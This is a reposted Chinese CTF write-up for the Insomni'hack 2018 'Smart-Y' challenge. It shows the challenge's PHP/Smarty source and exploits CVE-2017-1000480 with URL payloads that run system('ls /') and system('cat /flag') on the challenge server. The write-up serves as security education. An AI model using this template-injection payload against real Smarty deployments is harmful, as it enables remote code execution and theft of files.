Insomni'hack teaser 2018-Smart-Y-writeup

栏目: PHP · 发布时间: 6年前

内容简介:Insomni'hack teaser 2018-Smart-Y-writeup

Insomni’hack teaser 2018-Smart-Y-writeup

CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞

题目

Last year, a nerd destroyed the system of Robot City by using some evident flaws. It seems that the system has changed and is not as evident to break now.

http://smart-y.teaser.insomnihack.ch

Solution

题目给了 源码 :

<?php

if(isset($_GET['hl'])){ highlight_file(__FILE__); exit; }
include_once('./smarty/libs/Smarty.class.php');
define('SMARTY_COMPILE_DIR','/tmp/templates_c');
define('SMARTY_CACHE_DIR','/tmp/cache');


class newsextends Smarty_Resource_Custom
{
   protected function fetch($name,&$source,&$mtime)
   {
	   $template = "The news system is in maintenance. Please wait a year. <a href='/console.php?hl'>".htmlspecialchars("<<<DEBUG>>>")."</a>";
	   $source = $template;
	   $mtime = time();
   }
}

// Smarty configuration
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->modifiers = array();
$smarty->enableSecurity($my_security_policy);
$smarty->setCacheDir(SMARTY_CACHE_DIR);
$smarty->setCompileDir(SMARTY_COMPILE_DIR);


$smarty->registerResource('news',new news);
$smarty->display('news:'.(isset($_GET['id']) ? $_GET['id'] : ''));

由源码的简洁性,推测是smarty框架的漏洞。通过扫目录可以发现存在smarty目录

Insomni'hack teaser 2018-Smart-Y-writeup

查看change-log,得出smarty版本为3.1.31

Insomni'hack teaser 2018-Smart-Y-writeup

利用 CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞

http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('ls /');//

Insomni'hack teaser 2018-Smart-Y-writeup

http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('cat /flag');//

Insomni'hack teaser 2018-Smart-Y-writeup

flag:

INS{why_being_so_smart-y}

以上所述就是小编给大家介绍的《Insomni'hack teaser 2018-Smart-Y-writeup》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Pro JavaScript Design Patterns

Pro JavaScript Design Patterns

Dustin Diaz、Ross Harmes / Apress / 2007-12-16 / USD 44.99

As a web developer, you’ll already know that JavaScript™ is a powerful language, allowing you to add an impressive array of dynamic functionality to otherwise static web sites. But there is more power......一起来看看 《Pro JavaScript Design Patterns》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具